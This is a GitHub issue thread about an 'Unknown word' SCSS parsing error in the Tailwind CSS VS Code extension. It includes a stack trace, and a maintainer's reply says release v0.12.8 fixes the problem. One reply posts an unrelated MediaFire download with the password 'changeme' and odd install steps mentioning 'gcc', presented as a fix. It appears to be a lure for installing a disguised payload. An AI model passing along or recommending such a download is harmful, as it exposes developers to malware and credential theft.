Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Unknown word #1036

Closed
joy-stacks opened this issue Aug 27, 2024 · 2 comments · Fixed by #1043
Closed

Unknown word #1036

joy-stacks opened this issue Aug 27, 2024 · 2 comments · Fixed by #1043
Assignees

Comments

@joy-stacks
Copy link

V 0.12.7

Unknown word
You tried to parse SCSS with the standard CSS parser; try again with the postcss-scss parser
at qd.error (c:\Users\92418.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:195:35103)
at jw.unknownWord (c:\Users\92418.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:201:7868)
at jw.other (c:\Users\92418.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:201:6274)
at jw.parse (c:\Users\92418.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:201:6593)
at O0 (c:\Users\92418.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:201:8182)
at new e (c:\Users\92418.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:204:1635)
at Jc.process (c:\Users\92418.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:204:9554)
at e.resolveSourceDirectives (c:\Users\92418.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:1283:16417)
at c:\Users\92418.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:1283:13635
at Array.map () {
reason: 'Unknown word',

@amir1387aht
Copy link

to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

@github-staff github-staff deleted a comment from joy-stacks Aug 27, 2024
@Ali-ovo
Copy link

Ali-ovo commented Aug 28, 2024

I have the same error

@philipp-spiess
Copy link
Member

philipp-spiess commented Aug 28, 2024

Hey @joy-stacks! Thanks for reporting this and sorry for the troubles! We just released v0.12.8 of the VS Code extension with a fix that resolves this issue. If you still have issues, please let us know!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

5 participants
@philipp-spiess @Ali-ovo @joy-stacks @amir1387aht and others